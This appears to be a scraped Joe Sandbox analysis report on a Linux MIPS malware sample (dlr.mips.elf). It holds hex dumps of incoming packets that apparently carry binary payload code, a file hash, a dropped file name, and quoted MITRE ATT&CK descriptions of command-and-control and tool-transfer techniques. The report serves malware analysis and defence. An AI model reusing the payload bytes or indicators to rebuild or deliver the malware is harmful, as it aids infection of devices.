Nov 1, 2024 15:06:20.328885078 CET	1236	IN	Data Raw: 03 20 f8 09 af a2 00 20 8f bc 00 10 00 00 00 00 8f 99 82 b0 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 10 04 40 00 2b 00 00 00 00 14 40 00 23 24 04 00 02 8f 99 84 18 24 05 00 02 03 20 f8 09 00 00 30 21 8f bc 00 10 04 40 00 18 00 40 80 21 97 a3 Data Ascii: @+@#$$ 0!@@!T$> ! <@ !'< $AK(! !l $ $ 4
Nov 1, 2024 15:06:20.328896999 CET	1236	IN	Data Raw: af b7 00 74 af b6 00 70 af b5 00 6c af b4 00 68 af b3 00 64 af b2 00 60 af b1 00 5c af b0 00 58 af bc 00 18 8f 99 82 34 af a4 00 80 03 20 f8 09 00 00 20 21 8f bc 00 18 00 40 a0 21 8f 99 80 cc 8f 83 80 20 af b9 00 54 8f 99 83 c8 8f 92 84 f4 af b9 Data Ascii: tplhd`\X4 !@! T,' 0wqd4!8T&P<&Q@4(D @!HLP !4 !$B@$BP
Nov 1, 2024 15:06:20.328907967 CET	1236	IN	Data Raw: 8f 99 80 b4 00 00 00 00 03 20 f8 09 27 b0 00 18 8f bc 00 10 00 00 00 00 8f 99 80 b4 00 00 00 00 03 20 f8 09 24 04 00 02 8f bc 00 10 00 00 00 00 8f 99 84 c8 00 00 00 00 03 20 f8 09 02 00 20 21 8f bc 00 10 02 00 20 21 8f 99 83 e8 00 00 00 00 03 20 Data Ascii: ' $ ! ! $0!(! $$ $$ $$ $$ $$ $
Nov 1, 2024 15:06:20.328918934 CET	1236	IN	Data Raw: 8f bc 00 10 10 50 00 1b 00 00 00 00 14 40 00 28 00 00 00 00 8f 99 84 20 00 00 00 00 03 20 f8 09 02 40 20 21 8f bc 00 10 00 00 00 00 8f 99 80 b8 00 00 00 00 03 20 f8 09 02 20 20 21 8f bc 00 10 00 00 00 00 8f 99 82 38 00 00 00 00 03 20 f8 09 00 00 Data Ascii: P@( @ ! !8 @ !p $l !840,($ '@FtCdS(!$
Nov 1, 2024 15:06:20.329041958 CET	1236	IN	Data Raw: af a0 00 2c 10 80 ff a9 00 00 00 00 90 62 00 00 10 a0 ff a6 a2 02 00 04 90 71 00 01 00 00 00 00 02 b1 10 2a 14 40 ff a1 00 00 00 00 8f b9 00 38 26 24 00 01 03 20 f8 09 24 05 00 01 00 40 20 21 8f bc 00 20 ae 02 00 00 8f a2 00 2c 8f b0 00 28 24 42 Data Ascii: ,bq*@8&$ $@ ! ,($B&<@(!,( 0!, #2! $$rS$<'0!',($ !0$ $%tD
Nov 1, 2024 15:06:20.329061031 CET	356	IN	Data Raw: 24 02 00 13 ae 82 00 00 8f bf 01 14 8f b4 01 10 8f b3 01 0c 8f b2 01 08 8f b1 01 04 8f b0 01 00 03 e0 00 08 27 bd 01 18 10 a0 00 07 00 a0 20 21 8f 85 80 20 8f 99 82 78 24 a5 73 b0 03 20 f8 09 24 06 00 12 8f bc 00 10 24 02 00 12 ae 82 00 00 8f bf Data Ascii: $' ! x$s $$''! ! $' ! $'h@ ! $($6x$8(!'$ (!x'$
Nov 1, 2024 15:06:20.334961891 CET	1236	IN	Data Raw: 27 bd 01 18 8f 99 83 10 27 b0 00 21 02 00 20 21 03 20 f8 09 24 05 00 08 8f bc 00 10 27 b1 00 18 8f 99 83 10 02 20 20 21 03 20 f8 09 24 05 00 04 8f bc 00 10 27 b2 00 68 8f 99 83 10 02 40 20 21 03 20 f8 09 24 05 00 28 8f bc 00 10 24 02 00 38 8f 99 Data Ascii: ''! ! $' ! $'h@ ! $($8x(!' $ (!x'$ @(!x' $(`` !x' $6$6' $

System Behavior

Analysis Process: dlr.mips.elf PID: 5843, Parent PID: 5767

General

Start time (UTC):	14:06:18
Start date (UTC):	01/11/2024
Path:	/tmp/dlr.mips.elf
Arguments:	/tmp/dlr.mips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report dlr.mips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/dvrHelper

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Packets

System Behavior

Analysis Process: dlr.mips.elf PID: 5843, Parent PID: 5767

General

Chronological Activities

Linux Analysis Report
dlr.mips.elf